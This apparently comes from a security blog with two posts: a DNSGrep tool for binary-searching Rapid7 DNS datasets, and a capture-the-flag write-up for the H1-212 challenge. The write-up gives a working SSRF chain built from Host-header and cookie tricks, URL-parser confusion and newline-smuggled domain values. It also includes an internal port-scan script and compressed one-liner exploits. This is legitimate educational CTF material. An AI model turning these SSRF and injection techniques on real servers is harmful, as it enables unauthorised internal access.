DNSGrep — Quickly Searching Large DNS Datasets

The Rapid7 Project Sonar datasets are amazing resources. They represent scans across the internet, compressed and easy to download. This blog post will focus on two of these datasets:

https://opendata.rapid7.com/sonar.rdns_v2/ (rdns)
https://opendata.rapid7.com/sonar.fdns_v2/ (fdns_a)

Unfortunately, working with these datasets can be a bit slow as the rdns and fdns_a datasets each contain over 10GB of compressed text. My old workflow for using these datasets was not efficient:

ubuntu@client:~$ time gunzip -c fdns_a.json.gz | grep "erbbysam.com"
{"timestamp":"1535127239","name":"blog.erbbysam.com","type":"a","value":"54.190.33.125"}
{"timestamp":"1535133613","name":"erbbysam.com","type":"a","value":"104.154.120.133"}
{"timestamp":"1535155246","name":"www.erbbysam.com","type":"cname","value":"erbbysam.com"}
real 11m31.393s
user 12m29.212s
sys 1m37.672s

I suspected there had to be a faster way of searching these two datasets.

(TLDR, reverse and sort domains then binary search)

DNS Structure

A defining feature of the DNS system is its tree-like structure. Visiting this page, you are three levels below the root domain:

com
com.erbbysam
com.erbbysam.blog

The grep query above looks for a domain name tied to the root domain, not an arbitrary string in the file. If we could shape our dataset into a DNS tree, an equivalent lookup would just require a quick traversal of this tree.

Binary Search

The task of transforming a large dataset into a tree on disk and traversing this tree can be simplified further using a binary search algorithm.

The first step in using a binary search algorithm is to sort the data. One option, matching the format above, is the form “com.erbbysam.blog”. This would require a slightly more complex DNS reversal algorithm than necessary. To simplify, reverse each “value,name” line character by character instead:

moc.masybbre.golb,521.33.091.45
moc.masybbre,331.021.451.401
moc.masybbre.www,moc.masybbre
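To make the two options concrete, here is a minimal Python sketch of both reversals. The function names are mine, chosen for illustration; the pipeline in this post uses the `rev` command rather than this code.

```python
def reverse_labels(name: str) -> str:
    """Reverse the dot-separated labels: blog.erbbysam.com -> com.erbbysam.blog."""
    return ".".join(reversed(name.split(".")))


def reverse_line(line: str) -> str:
    """Reverse every character of the line, which is what `rev` does."""
    return line[::-1]


print(reverse_labels("blog.erbbysam.com"))
print(reverse_line("54.190.33.125,blog.erbbysam.com"))
```

Either form puts every name under the same parent domain next to each other once the data is sorted, which is all the binary search needs.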

There are no one-command solutions to sort a dataset that does not fit into memory (that I am aware of). To sort these large files, split the data into sorted chunks and then merge the results together:

# fetch the fdns_a file
wget -O fdns_a.gz https://opendata.rapid7.com/sonar.fdns_v2/2019-01-25-1548417890-fdns_a.json.gz

# extract and format our data
gunzip -c fdns_a.gz | jq -r '.value + ","+ .name' | tr '[:upper:]' '[:lower:]' | rev > fdns_a.rev.lowercase.txt

# split the data into chunks to sort
# via https://unix.stackexchange.com/a/350068 -- split and merge code
# -C (--line-bytes) caps each chunk at 100M without cutting a line in half
split -C 100M fdns_a.rev.lowercase.txt fileChunk

# remove the old files
rm fdns_a.gz
rm fdns_a.rev.lowercase.txt

# Sort each of the pieces and delete the unsorted one
# via https://unix.stackexchange.com/a/35472 -- use LC_COLLATE=C to sort ., chars
for f in fileChunk*; do LC_COLLATE=C sort "$f" > "$f".sorted && rm "$f"; done

# merge the sorted files with local tmp directory
mkdir -p sorttmp
LC_COLLATE=C sort -T sorttmp/ -muo fdns_a.sort.txt fileChunk*.sorted

# clean up
rm fileChunk*

More detailed instructions for running this script and the rdns equivalent can be found here:
https://github.com/erbbysam/DNSGrep#run
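For readers who prefer code to shell pipelines, the same split, sort and merge idea can be sketched in Python. This is an in-memory illustration only, and `sort_in_chunks` is a hypothetical name; a real external sort would write each sorted chunk to disk, as the script above does.

```python
import heapq
from itertools import groupby


def sort_in_chunks(lines, chunk_size):
    """Sort `lines` by sorting fixed-size chunks, then merging them.

    Mirrors split + sort + `sort -m -u`; a real external sort would keep
    each sorted chunk in a file instead of a list.
    """
    chunks = [
        sorted(lines[i:i + chunk_size])
        for i in range(0, len(lines), chunk_size)
    ]
    merged = heapq.merge(*chunks)                  # k-way merge of sorted runs
    return [line for line, _ in groupby(merged)]   # drop duplicates, like -u


print(sort_in_chunks(["b", "a", "c", "a", "d"], chunk_size=2))
```

Python compares strings by code point, which for ASCII data gives the same ordering as LC_COLLATE=C.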

DNSGrep

Now we can search the data! To accomplish this, I built a simple golang utility that can be found here:
https://github.com/erbbysam/DNSGrep

ubuntu@client:~$ ls -lath fdns_a.sort.txt
-rw-rw-r-- 1 ubuntu ubuntu 68G Feb  3 09:11 fdns_a.sort.txt
ubuntu@client:~$ time ./dnsgrep -f fdns_a.sort.txt -i "erbbysam.com"
104.154.120.133,erbbysam.com
54.190.33.125,blog.erbbysam.com
erbbysam.com,www.erbbysam.com

real    0m0.002s
user    0m0.000s
sys    0m0.000s

That is significantly faster!

The algorithm is pretty simple:

  1. Use a binary search algorithm to seek through the file, looking for a substring match against the query.
  2. Once a match is found, the file is scanned backwards in 10KB increments looking for a non-matching substring.
  3. Once a non-matching substring is found, the file is scanned forwards until all exact matches are returned.
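A rough Python sketch of the idea follows (the actual utility is written in Go). It is a simplified variant, not the tool's code: instead of finding any match and scanning backwards in 10KB increments, it binary searches directly for the first line that is not smaller than the reversed query, then scans forward. The names `line_at_or_after` and `search_sorted_file` are hypothetical, and the sketch assumes the file was sorted in byte order as above.

```python
import os


def line_at_or_after(f, offset):
    """Return the first complete line that starts at or after byte `offset`."""
    if offset == 0:
        f.seek(0)
    else:
        f.seek(offset - 1)
        f.readline()  # skip the rest of the line containing byte offset-1
    return f.readline()


def search_sorted_file(path, query):
    """Return every record whose reversed form starts with the reversed query."""
    prefix = query.lower()[::-1].encode()
    results = []
    with open(path, "rb") as f:
        lo, hi = 0, os.path.getsize(path)
        # Binary search over byte offsets for the first line >= prefix.
        while lo < hi:
            mid = (lo + hi) // 2
            line = line_at_or_after(f, mid)
            if line and line.rstrip(b"\n") < prefix:
                lo = mid + 1
            else:
                hi = mid
        # Matching lines are contiguous in a sorted file: scan forward.
        line = line_at_or_after(f, lo)
        while line and line.startswith(prefix):
            results.append(line.rstrip(b"\n")[::-1].decode())
            line = f.readline()
    return results
```

Each probe costs one seek and one short read, so a lookup touches only a few dozen places in the file no matter how large it is. Note that a plain prefix match like this would also return names such as xyzerbbysam.com.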

PoC

PoC disclaimer: There is no uptime/performance guarantee of this service and I likely will take this offline at some point in the future. Keep in mind that the datasets here are from a scan on 1/25/19 — DNS records may have changed by the time you read this.

As these queries are so quick, I set up an AWS EC2 t2.micro instance with a spinning disk (Cold HDD sc1) and hosted a server that allows queries into these datasets:
https://github.com/erbbysam/DNSGrep/tree/master/experimentalServer

https://dns.bufferover.run/dns?q=erbbysam.com

ubuntu@client:~$ curl 'https://dns.bufferover.run/dns?q=erbbysam.com' 
{
	"Meta": {
		"Runtime": "0.000361 seconds",
		"Errors": [
			"rdns error: failed to find exact match via binary search"
		],
		"FileNames": [
			"2019-01-25-1548417890-fdns_a.json.gz",
			"2019-01-30-1548868121-rdns.json.gz"
		],
		"TOS": "The source of this data is Rapid7 Labs. Please review the Terms of Service: https://opendata.rapid7.com/about/"
	},
	"FDNS_A": [
		"104.154.120.133,erbbysam.com",
		"54.190.33.125,blog.erbbysam.com",
		"erbbysam.com,www.erbbysam.com"
	],
	"RDNS": null
}

Having a bit of fun with this, I queried every North Korean domain name, grepping for the IPs not in North Korean IP space:
https://dns.bufferover.run/dns?q=.kp

ubuntu@client:~$ curl 'https://dns.bufferover.run/dns?q=.kp' 2> /dev/null | grep -v "\"175\.45\.17"
{
	"Meta": {
		"Runtime": "0.000534 seconds",
		"Errors": null,
		"FileNames": [
			"2019-01-25-1548417890-fdns_a.json.gz",
			"2019-01-30-1548868121-rdns.json.gz"
		],
		"TOS": "The source of this data is Rapid7 Labs. Please review the Terms of Service: https://opendata.rapid7.com/about/"
	},
	"FDNS_A": [
		"175.45.0.178,ns1.portal.net.kp",
	],
	"RDNS": [
		"185.33.146.18,north-korea.kp",
		"66.23.232.124,sverjd.ouie.kp",
		"64.86.226.78,ns2.friend.com.kp",
		"103.120.178.114,dedi.kani28test.kp",
		"198.98.49.51,gfw.kp",
		"185.86.149.212,hey.kp"
	]
}

That’s it! Hopefully this was useful! Give it a try: https://dns.bufferover.run/dns?q=<hostname>

H1-212 CTF

As with most problems in the world, this one started with a tweet:

Let’s find that flag!

TLDR


# step 0
curl -v http://104.236.20.43/
# step 1 
curl -v http://104.236.20.43/ -H 'Host: admin.acme.org'
# step 2
curl -v http://104.236.20.43/ -H 'Host: admin.acme.org' --cookie 'admin=yes'
# step 3
curl -v http://104.236.20.43/ -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST
# step 4
curl http://104.236.20.43/ -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST -H "Content-Type: application/json" -d '{}'
# step 5
curl http://104.236.20.43/ -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST -H "Content-Type: application/json" -d '{"domain":"localhost:22 @212.example.com"}'
curl -s http://104.236.20.43/read.php?id=(RETURNED ID) -H 'Host: admin.acme.org' --cookie 'admin=yes' | jq -r  '.data' | base64 -d
# step 6
curl http://104.236.20.43/ -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST -H "Content-Type: application/json" -d '{"domain":"localhost:1337 @212.example.com"}'
curl -s http://104.236.20.43/read.php?id=(RETURNED ID) -H 'Host: admin.acme.org' --cookie 'admin=yes' | jq -r  '.data' | base64 -d
# step 7
curl http://104.236.20.43/ -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST -H "Content-Type: application/json" -d '{"domain":"localhost:1337/flag\n212.example.com"}'
curl -s http://104.236.20.43/read.php?id=(RETURNED ID - 1) -H 'Host: admin.acme.org' --cookie 'admin=yes' | jq -r  '.data' | base64 -d
# step 7, output
FLAG: CF,2dsV\/]fRAYQ.TDEp`w"M(%mU;p9+9FD{Z48X*Jtt{%vS($g7\S):f%=P[Y@nka=<tqhnF<aq=K5:BC@Sb*{[%z"+@yPb/nfFna<e$hv{p8r2[vMMF52y:z/Dh;{6

Or if you would prefer a tweet sized solution:

H="Host: admin.acme.org";B="admin=yes";curl 104.236.20.43/read.php?id=$(expr $(curl 104.236.20.43/index.php -s -H "$H" -b "$B" -d '{"domain":"0:1337/flag\n212.h.com"}' -H "Content-Type: application/json"|sed 's/.*=\(.*\)\"}/\1/') - 1) -s -H "$H" -b "$B"|jq -r '.data'|base64 -d

But I digress. Still here? Cool, let’s find this flag and document the snags I hit along the way.

Step 1 — Virtual hosting

http://104.236.20.43/ greets us with the default Apache2 Ubuntu page.

This is the last time we will use our web browser for this CTF (curl time!)!

From the original tweet and blog post, we know to search for an “admin” interface on 104.236.20.43. We should check for “admin” hostnames (and paths, see setback 1.a below) among the sites hosted on the same server. This technique of hosting multiple sites behind the same IP/port is called name-based virtual hosting.

Checking any hostname returns the Apache2 Ubuntu default page, with the exception of admin.acme.org:

ubuntu@client:~$ curl -v http://104.236.20.43/ -H 'Host: admin.acme.org'
*   Trying 104.236.20.43...
* TCP_NODELAY set
* Connected to 104.236.20.43 (104.236.20.43) port 80 (#0)
> GET / HTTP/1.1
> Host: admin.acme.org
> User-Agent: curl/7.54.0
> Accept: */*
> 
< HTTP/1.1 200 OK
< Date: Fri, 17 Nov 2017 23:30:19 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Set-Cookie: admin=no
< Content-Length: 0
< Content-Type: text/html; charset=UTF-8
< 

For admin.acme.org we are provided a blank page and a cookie “admin=no”!

Setback 1.a — Brute force

Executing a brute force scan of the root directory returns nothing exciting, except a fake flag at http://104.236.20.43/flag

DNS or other related recon methods will not work as the public acme.org is not associated with this machine.

Step 2 — admin=yes

If we try a few values for the admin cookie, we find the only value that returns anything other than an HTTP 200 return code is “admin=yes”:

ubuntu@client:~$ curl -v http://104.236.20.43/ -H 'Host: admin.acme.org' --cookie 'admin=yes'
*   Trying 104.236.20.43...
* TCP_NODELAY set
* Connected to 104.236.20.43 (104.236.20.43) port 80 (#0)
> GET / HTTP/1.1
> Host: admin.acme.org
> User-Agent: curl/7.54.0
> Accept: */*
> Cookie: admin=yes
> 
< HTTP/1.1 405 Method Not Allowed
< Date: Sat, 18 Nov 2017 00:25:51 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Content-Length: 0
< Content-Type: text/html; charset=UTF-8
< 

At this point, we have a server returning a 405, which is not terribly exciting. At least there were no setbacks with this step 🙂

Step 3 — What is a 405?

An HTTP 405 response is defined (in RFC 7231, Section 6.5.5) as:

The 405 (Method Not Allowed) status code indicates that the method
received in the request-line is known by the origin server but not
supported by the target resource. The origin server MUST generate an
Allow header field in a 405 response containing a list of the target
resource’s currently supported methods.

An HTTP method is the verb sent by the client. In the request above it was “GET”, but there are many others available. The only method that returns anything different is POST, which returns a 406 error:

ubuntu@client:~$ curl -v http://104.236.20.43/ -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST
*   Trying 104.236.20.43...
* TCP_NODELAY set
* Connected to 104.236.20.43 (104.236.20.43) port 80 (#0)
> POST / HTTP/1.1
> Host: admin.acme.org
> User-Agent: curl/7.54.0
> Accept: */*
> Cookie: admin=yes
> 
< HTTP/1.1 406 Not Acceptable
< Date: Sat, 18 Nov 2017 00:37:46 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Content-Length: 0
< Content-Type: text/html; charset=UTF-8
< 

Aside — HTTP OPTIONS

An OPTIONS method with a * request target returns a list of allowed methods:

ubuntu@client:~$ curl -v http://104.236.20.43/* -H 'Host: admin.acme.org' --cookie 'admin=yes' -X OPTIONS 2>&1 | grep Allow
< Allow: GET,HEAD,POST,OPTIONS

Setback 3.a — 405 vs 406

I spent hours trying other HTTP methods as I did not notice that the POST request type returned a 406.

Step 4 — What is a 406?

Noticing a theme here yet? 🙂

An HTTP 406 response is defined (in RFC 7231, Section 6.5.6) as:

The 406 (Not Acceptable) status code indicates that the target
resource does not have a current representation that would be
acceptable to the user agent, according to the proactive negotiation
header fields received in the request (Section 5.3), and the server
is unwilling to supply a default representation.

A 406 typically refers to the Accept headers sent by a client (see setback 4.a). In our case, since we are sending a POST request which generally contains data, the server is complaining that our data is not correctly formatted. If we send a request with a content type “application/json”, we receive this response:

ubuntu@client:~$ curl http://104.236.20.43/ -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST -H "Content-Type: application/json"
{"error":{"body":"unable to decode"}}

By adding some data, we see that we are missing a domain field:

ubuntu@client:~$ curl http://104.236.20.43/ -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST -H "Content-Type: application/json" -d '{}'
{"error":{"domain":"required"}}

These errors actually come in as 418 teapot responses 🍵🍵🍵.

Setback 4.a — Accept all the things

Because I thought the 406 status code indicated something was missing from my “Accept” HTTP header (implying */* was not acceptable), I spent far too long gathering different acceptable Accept media types.

Step 5 — Domains

Sending a few domain values reveals the rules that a domain must follow:

  1. The domain must match the regex .*212.*\..*\.com; for example, 212.h.com and abc212abc.abc.com are both valid
  2. The domain cannot contain the characters: ? & \ % #
  3. The domain is parsed by PHP libcurl
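The first two rules can be approximated locally with a short Python check, which is handy for trying payloads before sending them. This is a guess at the behaviour inferred from responses, not the server's code: `looks_acceptable` is a hypothetical name, and whether the server anchors the pattern or checks before or after JSON decoding is an assumption.

```python
import re

# Rule 1 exactly as written above; using search() rather than a full match
# is an assumption about how the server applies it.
DOMAIN_PATTERN = re.compile(r".*212.*\..*\.com")

# Rule 2: characters the server rejects.
FORBIDDEN_CHARS = set("?&\\%#")


def looks_acceptable(domain: str) -> bool:
    """Return True if `domain` appears to satisfy rules 1 and 2."""
    if any(ch in FORBIDDEN_CHARS for ch in domain):
        return False
    return DOMAIN_PATTERN.search(domain) is not None


for candidate in ["212.h.com", "abc212abc.abc.com", "example.com", "212.h.com?x=1"]:
    print(candidate, looks_acceptable(candidate))
```

Rule 3 is the interesting one, since it concerns how the accepted string is later interpreted rather than whether it is accepted.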

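To put this into practice, let’s send a sample request (which will GET / from 212.erbbysam.com). Note that this is a two-step process: the POST returns a read.php ID, and a second request to read.php with that ID returns the base64-encoded result: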


ubuntu@client:~$ curl http://104.236.20.43/ -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST -H "Content-Type: application/json" -d '{"domain":"212.erbbysam.com"}'
{"next":"\/read.php?id=2150"}
ubuntu@client:~$ curl -s http://104.236.20.43/read.php?id=2150 -H 'Host: admin.acme.org' --cookie 'admin=yes'
{"data":"(base64 data removed)"}

Rule 3 above becomes obvious when the string “localhost:22 @212.example.com” is provided as a domain:

ubuntu@client:~$ curl http://104.236.20.43/ -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST -H "Content-Type: application/json" -d '{"domain":"localhost:22 @212.example.com"}'
{"next":"\/read.php?id=97"}
ubuntu@client:~$ curl -s http://104.236.20.43/read.php?id=97 -H 'Host: admin.acme.org' --cookie 'admin=yes' | jq -r  '.data' | base64 -d
SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.2
Protocol mismatch.

That string may look familiar as it is very similar to php libcurl issues that were observed in one of the best talks to come out of Vegas this year (besides my own 🙂 ) – https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf

Aside — Tornado black hole

Hosting a simple python tornado server at 212.erbbysam.com allowed me to reason about what the server’s code actually looked like by observing the requests coming in:

import tornado.ioloop
import tornado.web

class MainHandler(tornado.web.RequestHandler):
    def get(self):
        # log every incoming request so we can see what the CTF server sends
        print(self.request)

def make_app():
    return tornado.web.Application([
        (r"/.*", MainHandler),  # match every path
    ])

if __name__ == "__main__":
    app = make_app()
    app.listen(80)  # binding to port 80 typically requires root
    tornado.ioloop.IOLoop.current().start()

Step 6 — Internal network scan

Suspecting that pivoting to something only accessible locally was the next step (while trying all the things™), I set up a simple Go program to scan every accessible port (similar to port 22 above):

package main

import (
    "fmt"
    "os/exec"
    "strconv"
    "strings"
)

// Cmd runs a shell command and returns whatever it wrote to stdout.
func Cmd(cmd string) []byte {
    out, err := exec.Command("bash", "-c", cmd).Output()
    if err != nil {
        fmt.Printf("error -- %s\n", cmd)
    }
    return out
}

func main() {
    // valid TCP ports run from 1 through 65535
    for port := 1; port <= 65535; port++ {
        fmt.Printf("%d -- ", port)
        // ask the server to fetch localhost:<port>
        cmd := fmt.Sprintf("curl http://104.236.20.43/index.php --header 'Host: admin.acme.org' --cookie 'admin=yes' -v -X POST -d '{\"domain\":\"localhost:%d @212.example.com\"}' -H 'Content-Type: application/json' --max-time 10 ", port)
        out := strings.TrimSpace(string(Cmd(cmd)))
        // strip the JSON wrapper, leaving only the numeric read.php ID
        out = strings.TrimSuffix(strings.TrimPrefix(out, "{\"next\":\"\\/read.php?id="), "\"}")
        id, err := strconv.Atoi(out)

        if err == nil {
            // fetch the stored response for that ID
            cmd = fmt.Sprintf("curl http://104.236.20.43/read.php?id=%d --header 'Host: admin.acme.org' --cookie \"admin=yes\" -v --max-time 10 ", id)
            fmt.Println(string(Cmd(cmd)))
        } else {
            fmt.Println("invalid")
        }
    }
}

Running this code only produced a few interesting hits:

ubuntu@client:~/go/scan$ go run test.go
...
22 -- {"data":"U1NILTIuMC1PcGVuU1NIXzcuMnAyIFVidW50dS00dWJ1bnR1Mi4yDQpQcm90b2NvbCBtaXNtYXRjaC4K"} (SSH example above)
53 -- error (local dns server)
80 -- {"data":"CjwhRE9DVFlQRSBodG1sIFBVQkxJQ... (default ubuntu page)
1337 -- {"data":"SG1tLCB3aGVyZSB3b3VsZCBpdCBiZT8K"} ("Hmm, where would it be?")

The 1337 port appears to be running an http server (and it’s hinting that we’re getting close)!
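The "data" values in the scan output are base64, so reading them means decoding each one. A minimal Python sketch that does the same job as the `jq -r '.data' | base64 -d` pipeline used elsewhere in this post (the helper name `decode_read_response` is mine):

```python
import base64
import json


def decode_read_response(body: str) -> str:
    """Decode the base64 "data" field of a read.php response body."""
    payload = json.loads(body)
    return base64.b64decode(payload["data"]).decode("utf-8", errors="replace")


# The port 1337 response from the scan output above.
print(decode_read_response('{"data":"SG1tLCB3aGVyZSB3b3VsZCBpdCBiZT8K"}'), end="")
```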

Step 7 — Reaching /flag on 1337

This part is a bit tricky. An intentional “bug” in the domain parsing script meant that a \n character would split a request into two separate reads (incrementing the read.php ID twice). To demonstrate this, I will make two consecutive calls with a \n:

ubuntu@client:~$ curl http://104.236.20.43/ -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST -H "Content-Type: application/json" -d '{"domain":"localhost:80/\n212.h.com"}'
{"next":"\/read.php?id=2139"}
ubuntu@client:~$ curl http://104.236.20.43/ -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST -H "Content-Type: application/json" -d '{"domain":"localhost:1337/\n212.example.com"}'
{"next":"\/read.php?id=2141"}

In this case read.php?id=2140 will access “localhost:1337/” while read.php?id=2141 will access “212.example.com”. This allows us to access localhost:1337/flag and grab our flag while still satisfying the domain rules from step 5!

ubuntu@client:~$ curl http://104.236.20.43/ -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST -H "Content-Type: application/json" -d '{"domain":"localhost:1337/flag\n212.example.com"}'
{"next":"\/read.php?id=2143"}
ubuntu@client:~$ curl -s http://104.236.20.43/read.php?id=2142 -H 'Host: admin.acme.org' --cookie 'admin=yes' | jq -r  '.data' | base64 -d
FLAG: CF,2dsV\/]fRAYQ.TDEp`w"M(%mU;p9+9FD{Z48X*Jtt{%vS($g7\S):f%=P[Y@nka=<tqhnF<aq=K5:BC@Sb*{[%z"+@yPb/nfFna<e$hv{p8r2[vMMF52y:z/Dh;{6
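The only bookkeeping in this step is subtracting one from the ID that the POST returns. A small Python sketch of that arithmetic, assuming the response always has the {"next":"\/read.php?id=N"} shape seen above (`previous_read_id` is a hypothetical helper, not part of the challenge):

```python
import json
import re


def previous_read_id(post_response: str) -> int:
    """Return the read.php ID one below the ID named in the POST response."""
    next_path = json.loads(post_response)["next"]   # e.g. "/read.php?id=2143"
    match = re.search(r"id=(\d+)$", next_path)
    if match is None:
        raise ValueError("no read.php id in response: %r" % post_response)
    return int(match.group(1)) - 1


print(previous_read_id(r'{"next":"\/read.php?id=2143"}'))
```

For the response shown above this yields 2142, the ID used in the final request.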

Setback 7.a — Unicode characters

Using the python tornado server above, I observed that any Unicode character (as \uXXXX where X is a hex digit) could be passed through the server (with the exception of the character list in step 5). This is due to the use of JSON encoding, but it went entirely unused here.
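What JSON decoding does to these escapes is easy to see locally. The sketch below uses Python's json module and a made-up `decode_domain` helper; I am assuming the server's decoder treats escapes the same way, which matches what I observed but is not confirmed by its source.

```python
import json


def decode_domain(body: str) -> str:
    """Return the "domain" value from a JSON request body after decoding."""
    return json.loads(body)["domain"]


# \uXXXX escapes turn into ordinary characters after decoding.
print(decode_domain(r'{"domain":"\u0032\u0031\u0032.h.com"}'))

# A \n escape turns into a real newline inside the decoded string.
print(decode_domain(r'{"domain":"localhost:1337/flag\n212.h.com"}').splitlines())
```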

Setback 7.b — \n

I could not figure out why my request would disappear when a \n was passed in (no error appeared and no domain was contacted). My breakthrough came when I tried the domain “212.erbbysam.com:80/flag\n212.erbbysam.com” and the ID that was returned produced a GET / request. I then noticed the ID had incremented twice (the first ID would GET /flag; the second ID, the value returned, would GET /).

Conclusion

In conclusion, never stop trying all the things™ and always be on the lookout for interesting papers and presentations (I’m not sure if I would have finished this without knowing about that Black Hat URL parser presentation).

Taking the curl requests from step 7, creating a few temporary bash variables and changing “localhost” to “0” we reduce this CTF to proper tweet form (277 characters):

H="Host: admin.acme.org";B="admin=yes";curl 104.236.20.43/read.php?id=$(expr $(curl 104.236.20.43/index.php -s -H "$H" -b "$B" -d '{"domain":"0:1337/flag\n212.h.com"}' -H "Content-Type: application/json"|sed 's/.*=\(.*\)\"}/\1/') - 1) -s -H "$H" -b "$B"|jq -r '.data'|base64 -d

Huge shout-out to @NahamSec and @jobertama for this awesome challenge & thanks for reading 🙂